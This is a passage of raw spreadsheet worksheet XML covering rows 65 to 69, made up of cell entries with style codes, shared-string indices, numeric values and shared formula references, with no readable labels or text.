      <c r="AJ65" s="78"/>
      <c r="AK65" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL65" s="78"/>
      <c r="AM65" s="78"/>
      <c r="AN65" s="78"/>
      <c r="AO65" s="78"/>
      <c r="AP65" s="80"/>
      <c r="AQ65" s="80"/>
      <c r="AR65" s="80"/>
      <c r="AS65" s="80">
        <v>0.0</v>
      </c>
      <c r="AT65" s="80"/>
      <c r="AU65" s="80"/>
      <c r="AV65" s="80"/>
      <c r="AW65" s="80"/>
      <c r="AX65" s="80"/>
      <c r="AY65" s="80"/>
      <c r="AZ65" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA65" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB65" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC65" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD65" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE65" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF65" s="82"/>
      <c r="BG65" s="82"/>
      <c r="BH65" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI65" s="82"/>
      <c r="BJ65" s="82"/>
      <c r="BK65" s="82"/>
      <c r="BL65" s="82"/>
      <c r="BM65" s="83"/>
      <c r="BN65" s="83"/>
      <c r="BO65" s="83"/>
      <c r="BP65" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ65" s="83"/>
      <c r="BR65" s="83"/>
      <c r="BS65" s="83"/>
      <c r="BT65" s="83"/>
      <c r="BU65" s="83"/>
      <c r="BV65" s="83"/>
      <c r="BW65" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX65" s="105">
        <v>15578.0</v>
      </c>
      <c r="BY65" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ65" s="85">
        <v>4822.0</v>
      </c>
      <c r="CA65" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB65" s="105">
        <v>15578.0</v>
      </c>
      <c r="CC65" s="105"/>
      <c r="CD65" s="105"/>
      <c r="CE65" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF65" s="105"/>
      <c r="CG65" s="105"/>
      <c r="CH65" s="105"/>
      <c r="CI65" s="105"/>
      <c r="CJ65" s="106"/>
      <c r="CK65" s="106"/>
      <c r="CL65" s="106"/>
      <c r="CM65" s="86">
        <v>1.0</v>
      </c>
      <c r="CN65" s="86"/>
      <c r="CO65" s="86"/>
      <c r="CP65" s="86"/>
      <c r="CQ65" s="86"/>
      <c r="CR65" s="86"/>
      <c r="CS65" s="86"/>
      <c r="CT65" s="87">
        <f t="shared" si="7"/>
        <v>0.00001246603007</v>
      </c>
      <c r="CU65" s="88" t="s">
        <v>742</v>
      </c>
      <c r="CV65" s="88">
        <v>3.0</v>
      </c>
      <c r="CW65" s="88">
        <v>4843.0</v>
      </c>
      <c r="CX65" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY65" s="88" t="s">
        <v>743</v>
      </c>
      <c r="CZ65" s="88"/>
      <c r="DA65" s="88"/>
      <c r="DB65" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC65" s="88"/>
      <c r="DD65" s="88"/>
      <c r="DE65" s="88"/>
      <c r="DF65" s="88"/>
      <c r="DG65" s="89"/>
      <c r="DH65" s="89"/>
      <c r="DI65" s="89"/>
      <c r="DJ65" s="89">
        <v>1.0</v>
      </c>
      <c r="DK65" s="89"/>
      <c r="DL65" s="89"/>
      <c r="DM65" s="89"/>
      <c r="DN65" s="89"/>
      <c r="DO65" s="89"/>
      <c r="DP65" s="89"/>
      <c r="DQ65" s="90">
        <f t="shared" si="9"/>
        <v>0.00001246603007</v>
      </c>
      <c r="DR65" s="91"/>
      <c r="DS65" s="92">
        <v>17533.0</v>
      </c>
      <c r="DT65" s="93">
        <v>1.0</v>
      </c>
      <c r="DU65" s="93">
        <v>635.0</v>
      </c>
      <c r="DV65" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW65" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX65" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY65" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ65" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA65" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB65" s="74">
        <v>6224.0</v>
      </c>
      <c r="EC65" s="74">
        <v>350.0</v>
      </c>
      <c r="ED65" s="95">
        <f t="shared" si="10"/>
        <v>0.004363110524</v>
      </c>
      <c r="EE65" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="66" ht="153.75" customHeight="1">
      <c r="B66" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C66" s="72" t="s">
        <v>744</v>
      </c>
      <c r="D66" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E66" s="72" t="s">
        <v>674</v>
      </c>
      <c r="F66" s="72" t="s">
        <v>675</v>
      </c>
      <c r="G66" s="97" t="s">
        <v>745</v>
      </c>
      <c r="H66" s="72" t="s">
        <v>746</v>
      </c>
      <c r="I66" s="73" t="s">
        <v>678</v>
      </c>
      <c r="J66" s="73" t="s">
        <v>747</v>
      </c>
      <c r="K66" s="73" t="s">
        <v>748</v>
      </c>
      <c r="L66" s="74">
        <v>734221.0</v>
      </c>
      <c r="M66" s="74">
        <v>1.0</v>
      </c>
      <c r="N66" s="74">
        <v>1.0</v>
      </c>
      <c r="O66" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P66" s="74">
        <v>1.0</v>
      </c>
      <c r="Q66" s="74">
        <v>0.0</v>
      </c>
      <c r="R66" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S66" s="76" t="s">
        <v>749</v>
      </c>
      <c r="T66" s="76" t="s">
        <v>750</v>
      </c>
      <c r="U66" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V66" s="76" t="s">
        <v>256</v>
      </c>
      <c r="W66" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X66" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y66" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z66" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA66" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB66" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC66" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD66" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE66" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF66" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG66" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH66" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI66" s="78"/>
      <c r="AJ66" s="78"/>
      <c r="AK66" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL66" s="78"/>
      <c r="AM66" s="78"/>
      <c r="AN66" s="78"/>
      <c r="AO66" s="78"/>
      <c r="AP66" s="80"/>
      <c r="AQ66" s="80"/>
      <c r="AR66" s="80"/>
      <c r="AS66" s="80">
        <v>0.0</v>
      </c>
      <c r="AT66" s="80"/>
      <c r="AU66" s="80"/>
      <c r="AV66" s="80"/>
      <c r="AW66" s="80"/>
      <c r="AX66" s="80"/>
      <c r="AY66" s="80"/>
      <c r="AZ66" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA66" s="82">
        <v>2012801.0</v>
      </c>
      <c r="BB66" s="82">
        <v>1.0</v>
      </c>
      <c r="BC66" s="82">
        <v>39958.0</v>
      </c>
      <c r="BD66" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE66" s="82">
        <v>2012801.0</v>
      </c>
      <c r="BF66" s="82"/>
      <c r="BG66" s="82"/>
      <c r="BH66" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI66" s="82"/>
      <c r="BJ66" s="82"/>
      <c r="BK66" s="82"/>
      <c r="BL66" s="82"/>
      <c r="BM66" s="83"/>
      <c r="BN66" s="83"/>
      <c r="BO66" s="83"/>
      <c r="BP66" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ66" s="83"/>
      <c r="BR66" s="83"/>
      <c r="BS66" s="83"/>
      <c r="BT66" s="83"/>
      <c r="BU66" s="83"/>
      <c r="BV66" s="83"/>
      <c r="BW66" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX66" s="85">
        <v>2012801.0</v>
      </c>
      <c r="BY66" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ66" s="85">
        <v>39958.0</v>
      </c>
      <c r="CA66" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB66" s="85">
        <v>2012801.0</v>
      </c>
      <c r="CC66" s="85"/>
      <c r="CD66" s="85"/>
      <c r="CE66" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF66" s="85"/>
      <c r="CG66" s="85"/>
      <c r="CH66" s="85"/>
      <c r="CI66" s="85"/>
      <c r="CJ66" s="86"/>
      <c r="CK66" s="86"/>
      <c r="CL66" s="86"/>
      <c r="CM66" s="86">
        <v>0.0</v>
      </c>
      <c r="CN66" s="86"/>
      <c r="CO66" s="86"/>
      <c r="CP66" s="86"/>
      <c r="CQ66" s="86"/>
      <c r="CR66" s="86"/>
      <c r="CS66" s="86"/>
      <c r="CT66" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU66" s="88" t="s">
        <v>751</v>
      </c>
      <c r="CV66" s="88">
        <v>6.0</v>
      </c>
      <c r="CW66" s="88">
        <v>46208.0</v>
      </c>
      <c r="CX66" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY66" s="88" t="s">
        <v>751</v>
      </c>
      <c r="CZ66" s="88"/>
      <c r="DA66" s="88"/>
      <c r="DB66" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC66" s="88"/>
      <c r="DD66" s="88"/>
      <c r="DE66" s="88"/>
      <c r="DF66" s="88"/>
      <c r="DG66" s="89"/>
      <c r="DH66" s="89"/>
      <c r="DI66" s="89"/>
      <c r="DJ66" s="89">
        <v>0.0</v>
      </c>
      <c r="DK66" s="89"/>
      <c r="DL66" s="89"/>
      <c r="DM66" s="89"/>
      <c r="DN66" s="89"/>
      <c r="DO66" s="89"/>
      <c r="DP66" s="89"/>
      <c r="DQ66" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR66" s="91"/>
      <c r="DS66" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT66" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU66" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV66" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW66" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX66" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY66" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ66" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA66" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB66" s="74">
        <v>734221.0</v>
      </c>
      <c r="EC66" s="74">
        <v>0.0</v>
      </c>
      <c r="ED66" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE66" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="67" ht="153.75" customHeight="1">
      <c r="B67" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C67" s="72" t="s">
        <v>744</v>
      </c>
      <c r="D67" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E67" s="72" t="s">
        <v>674</v>
      </c>
      <c r="F67" s="72" t="s">
        <v>675</v>
      </c>
      <c r="G67" s="97" t="s">
        <v>745</v>
      </c>
      <c r="H67" s="72" t="s">
        <v>746</v>
      </c>
      <c r="I67" s="73" t="s">
        <v>678</v>
      </c>
      <c r="J67" s="73" t="s">
        <v>752</v>
      </c>
      <c r="K67" s="73" t="s">
        <v>753</v>
      </c>
      <c r="L67" s="74">
        <v>26860.0</v>
      </c>
      <c r="M67" s="74">
        <v>1.0</v>
      </c>
      <c r="N67" s="74">
        <v>1.0</v>
      </c>
      <c r="O67" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P67" s="74">
        <v>1.0</v>
      </c>
      <c r="Q67" s="74">
        <v>0.0</v>
      </c>
      <c r="R67" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S67" s="76" t="s">
        <v>749</v>
      </c>
      <c r="T67" s="76" t="s">
        <v>754</v>
      </c>
      <c r="U67" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V67" s="76" t="s">
        <v>256</v>
      </c>
      <c r="W67" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X67" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y67" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z67" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA67" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB67" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC67" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD67" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE67" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF67" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG67" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH67" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI67" s="78"/>
      <c r="AJ67" s="78"/>
      <c r="AK67" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL67" s="78"/>
      <c r="AM67" s="78"/>
      <c r="AN67" s="78"/>
      <c r="AO67" s="78"/>
      <c r="AP67" s="80"/>
      <c r="AQ67" s="80"/>
      <c r="AR67" s="80"/>
      <c r="AS67" s="80">
        <v>0.0</v>
      </c>
      <c r="AT67" s="80"/>
      <c r="AU67" s="80"/>
      <c r="AV67" s="80"/>
      <c r="AW67" s="80"/>
      <c r="AX67" s="80"/>
      <c r="AY67" s="80"/>
      <c r="AZ67" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA67" s="82">
        <v>2016897.0</v>
      </c>
      <c r="BB67" s="82">
        <v>1.0</v>
      </c>
      <c r="BC67" s="82">
        <v>1.0</v>
      </c>
      <c r="BD67" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE67" s="82">
        <v>2016897.0</v>
      </c>
      <c r="BF67" s="82"/>
      <c r="BG67" s="82"/>
      <c r="BH67" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI67" s="82"/>
      <c r="BJ67" s="82"/>
      <c r="BK67" s="82"/>
      <c r="BL67" s="82"/>
      <c r="BM67" s="83"/>
      <c r="BN67" s="83"/>
      <c r="BO67" s="83"/>
      <c r="BP67" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ67" s="83"/>
      <c r="BR67" s="83"/>
      <c r="BS67" s="83"/>
      <c r="BT67" s="83"/>
      <c r="BU67" s="83"/>
      <c r="BV67" s="83"/>
      <c r="BW67" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX67" s="85">
        <v>2016897.0</v>
      </c>
      <c r="BY67" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ67" s="85">
        <v>1.0</v>
      </c>
      <c r="CA67" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB67" s="85">
        <v>2016897.0</v>
      </c>
      <c r="CC67" s="85"/>
      <c r="CD67" s="85"/>
      <c r="CE67" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF67" s="85"/>
      <c r="CG67" s="85"/>
      <c r="CH67" s="85"/>
      <c r="CI67" s="85"/>
      <c r="CJ67" s="86"/>
      <c r="CK67" s="86"/>
      <c r="CL67" s="86"/>
      <c r="CM67" s="86">
        <v>0.0</v>
      </c>
      <c r="CN67" s="86"/>
      <c r="CO67" s="86"/>
      <c r="CP67" s="86"/>
      <c r="CQ67" s="86"/>
      <c r="CR67" s="86"/>
      <c r="CS67" s="86"/>
      <c r="CT67" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU67" s="88" t="s">
        <v>755</v>
      </c>
      <c r="CV67" s="88">
        <v>3.0</v>
      </c>
      <c r="CW67" s="88">
        <v>16.0</v>
      </c>
      <c r="CX67" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY67" s="88" t="s">
        <v>755</v>
      </c>
      <c r="CZ67" s="88"/>
      <c r="DA67" s="88"/>
      <c r="DB67" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC67" s="88"/>
      <c r="DD67" s="88"/>
      <c r="DE67" s="88"/>
      <c r="DF67" s="88"/>
      <c r="DG67" s="89"/>
      <c r="DH67" s="89"/>
      <c r="DI67" s="89"/>
      <c r="DJ67" s="89">
        <v>0.0</v>
      </c>
      <c r="DK67" s="89"/>
      <c r="DL67" s="89"/>
      <c r="DM67" s="89"/>
      <c r="DN67" s="89"/>
      <c r="DO67" s="89"/>
      <c r="DP67" s="89"/>
      <c r="DQ67" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR67" s="91"/>
      <c r="DS67" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT67" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU67" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV67" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW67" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX67" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY67" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ67" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA67" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB67" s="74">
        <v>10618.0</v>
      </c>
      <c r="EC67" s="74">
        <v>0.0</v>
      </c>
      <c r="ED67" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE67" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="68" ht="153.75" customHeight="1">
      <c r="B68" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C68" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D68" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E68" s="72" t="s">
        <v>756</v>
      </c>
      <c r="F68" s="72" t="s">
        <v>757</v>
      </c>
      <c r="G68" s="97" t="s">
        <v>758</v>
      </c>
      <c r="H68" s="72" t="s">
        <v>759</v>
      </c>
      <c r="I68" s="73" t="s">
        <v>760</v>
      </c>
      <c r="J68" s="73" t="s">
        <v>761</v>
      </c>
      <c r="K68" s="73" t="s">
        <v>762</v>
      </c>
      <c r="L68" s="74">
        <v>2.0</v>
      </c>
      <c r="M68" s="74">
        <v>1.0</v>
      </c>
      <c r="N68" s="74">
        <v>1.0</v>
      </c>
      <c r="O68" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P68" s="74">
        <v>1.0</v>
      </c>
      <c r="Q68" s="74">
        <v>0.0</v>
      </c>
      <c r="R68" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S68" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T68" s="76" t="s">
        <v>763</v>
      </c>
      <c r="U68" s="77" t="s">
        <v>764</v>
      </c>
      <c r="V68" s="76" t="s">
        <v>765</v>
      </c>
      <c r="W68" s="76" t="s">
        <v>766</v>
      </c>
      <c r="X68" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y68" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z68" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA68" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB68" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC68" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD68" s="78">
        <v>1917.0</v>
      </c>
      <c r="AE68" s="78">
        <v>1.0</v>
      </c>
      <c r="AF68" s="78">
        <v>8.0</v>
      </c>
      <c r="AG68" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH68" s="78">
        <v>1917.0</v>
      </c>
      <c r="AI68" s="78"/>
      <c r="AJ68" s="78"/>
      <c r="AK68" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL68" s="78"/>
      <c r="AM68" s="78"/>
      <c r="AN68" s="78"/>
      <c r="AO68" s="78"/>
      <c r="AP68" s="80"/>
      <c r="AQ68" s="80"/>
      <c r="AR68" s="80"/>
      <c r="AS68" s="80">
        <v>0.0</v>
      </c>
      <c r="AT68" s="80"/>
      <c r="AU68" s="80"/>
      <c r="AV68" s="80"/>
      <c r="AW68" s="80"/>
      <c r="AX68" s="80"/>
      <c r="AY68" s="80"/>
      <c r="AZ68" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA68" s="82">
        <v>1917.0</v>
      </c>
      <c r="BB68" s="82">
        <v>1.0</v>
      </c>
      <c r="BC68" s="82">
        <v>8.0</v>
      </c>
      <c r="BD68" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE68" s="82">
        <v>1917.0</v>
      </c>
      <c r="BF68" s="82"/>
      <c r="BG68" s="82"/>
      <c r="BH68" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI68" s="82"/>
      <c r="BJ68" s="82"/>
      <c r="BK68" s="82"/>
      <c r="BL68" s="82"/>
      <c r="BM68" s="83"/>
      <c r="BN68" s="83"/>
      <c r="BO68" s="83"/>
      <c r="BP68" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ68" s="83"/>
      <c r="BR68" s="83"/>
      <c r="BS68" s="83"/>
      <c r="BT68" s="83"/>
      <c r="BU68" s="83"/>
      <c r="BV68" s="83"/>
      <c r="BW68" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX68" s="85">
        <v>1917.0</v>
      </c>
      <c r="BY68" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ68" s="85">
        <v>16.0</v>
      </c>
      <c r="CA68" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB68" s="85">
        <v>1917.0</v>
      </c>
      <c r="CC68" s="85"/>
      <c r="CD68" s="85"/>
      <c r="CE68" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF68" s="85"/>
      <c r="CG68" s="85"/>
      <c r="CH68" s="85"/>
      <c r="CI68" s="85"/>
      <c r="CJ68" s="86"/>
      <c r="CK68" s="86"/>
      <c r="CL68" s="86"/>
      <c r="CM68" s="86">
        <v>0.0</v>
      </c>
      <c r="CN68" s="86"/>
      <c r="CO68" s="86"/>
      <c r="CP68" s="86"/>
      <c r="CQ68" s="86"/>
      <c r="CR68" s="86"/>
      <c r="CS68" s="86"/>
      <c r="CT68" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU68" s="88" t="s">
        <v>767</v>
      </c>
      <c r="CV68" s="88">
        <v>5.0</v>
      </c>
      <c r="CW68" s="88">
        <v>21884.0</v>
      </c>
      <c r="CX68" s="79" t="s">
        <v>768</v>
      </c>
      <c r="CY68" s="88" t="s">
        <v>769</v>
      </c>
      <c r="CZ68" s="88"/>
      <c r="DA68" s="88"/>
      <c r="DB68" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC68" s="88"/>
      <c r="DD68" s="88"/>
      <c r="DE68" s="88"/>
      <c r="DF68" s="88"/>
      <c r="DG68" s="89"/>
      <c r="DH68" s="89"/>
      <c r="DI68" s="89"/>
      <c r="DJ68" s="89">
        <v>0.0</v>
      </c>
      <c r="DK68" s="89"/>
      <c r="DL68" s="89"/>
      <c r="DM68" s="89"/>
      <c r="DN68" s="89"/>
      <c r="DO68" s="89"/>
      <c r="DP68" s="89"/>
      <c r="DQ68" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR68" s="91"/>
      <c r="DS68" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT68" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU68" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV68" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW68" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX68" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY68" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ68" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA68" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB68" s="74">
        <v>0.0</v>
      </c>
      <c r="EC68" s="74">
        <v>0.0</v>
      </c>
      <c r="ED68" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE68" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="69" ht="153.75" customHeight="1">
      <c r="B69" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C69" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D69" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E69" s="72" t="s">
        <v>756</v>
      </c>
      <c r="F69" s="72" t="s">
        <v>757</v>
      </c>
      <c r="G69" s="97" t="s">
        <v>758</v>
      </c>
      <c r="H69" s="72" t="s">
        <v>759</v>
      </c>
      <c r="I69" s="73" t="s">
        <v>770</v>
      </c>
      <c r="J69" s="73" t="s">
        <v>771</v>
      </c>
      <c r="K69" s="73" t="s">
        <v>772</v>
      </c>
      <c r="L69" s="74">
        <v>521157.0</v>
      </c>
      <c r="M69" s="74">
        <v>1.0</v>
      </c>
      <c r="N69" s="74">
        <v>1.0</v>
      </c>
      <c r="O69" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P69" s="74">
        <v>1.0</v>
      </c>
      <c r="Q69" s="74">
        <v>0.0</v>
      </c>
      <c r="R69" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S69" s="76" t="s">
        <v>773</v>
      </c>
      <c r="T69" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U69" s="77" t="s">
        <v>256</v>
      </c>
      <c r="V69" s="76" t="s">
        <v>256</v>
      </c>
      <c r="W69" s="76" t="s">
        <v>256</v>
      </c>
      <c r="X69" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y69" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z69" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA69" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB69" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC69" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD69" s="78">
        <v>402.0</v>
      </c>
      <c r="AE69" s="78">
        <v>1.0</v>
      </c>
      <c r="AF69" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG69" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH69" s="78">
        <v>402.0</v>
      </c>
      <c r="AI69" s="78"/>
      <c r="AJ69" s="78"/>
      <c r="AK69" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL69" s="78"/>
      <c r="AM69" s="78"/>
      <c r="AN69" s="78"/>
      <c r="AO69" s="78"/>
      <c r="AP69" s="80"/>
      <c r="AQ69" s="80"/>
      <c r="AR69" s="80"/>
      <c r="AS69" s="80">
        <v>0.0</v>
      </c>
      <c r="AT69" s="80"/>
      <c r="AU69" s="80"/>
      <c r="AV69" s="80"/>
      <c r="AW69" s="80"/>
      <c r="AX69" s="80"/>
      <c r="AY69" s="80"/>
      <c r="AZ69" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA69" s="82">
        <v>402.0</v>
      </c>
      <c r="BB69" s="82">
        <v>1.0</v>
      </c>
      <c r="BC69" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD69" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE69" s="82">
        <v>402.0</v>
      </c>
      <c r="BF69" s="82"/>
      <c r="BG69" s="82"/>
      <c r="BH69" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI69" s="82"/>
      <c r="BJ69" s="82"/>
      <c r="BK69" s="82"/>
      <c r="BL69" s="82"/>
      <c r="BM69" s="83"/>
      <c r="BN69" s="83"/>
      <c r="BO69" s="83"/>
      <c r="BP69" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ69" s="83"/>
      <c r="BR69" s="83"/>
      <c r="BS69" s="83"/>
      <c r="BT69" s="83"/>
      <c r="BU69" s="83"/>
      <c r="BV69" s="83"/>
      <c r="BW69" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX69" s="85">
        <v>402.0</v>
      </c>
      <c r="BY69" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ69" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA69" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB69" s="85">
        <v>402.0</v>
      </c>
      <c r="CC69" s="85"/>
      <c r="CD69" s="85"/>
      <c r="CE69" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF69" s="85"/>
      <c r="CG69" s="85"/>
      <c r="CH69" s="85"/>
      <c r="CI69" s="85"/>
      <c r="CJ69" s="86"/>
      <c r="CK69" s="86"/>
      <c r="CL69" s="86"/>
      <c r="CM69" s="86">
        <v>0.0</v>
      </c>
      <c r="CN69" s="86"/>
      <c r="CO69" s="86"/>
      <c r="CP69" s="86"/>
      <c r="CQ69" s="86"/>
      <c r="CR69" s="86"/>
      <c r="CS69" s="86"/>
      <c r="CT69" s="87">
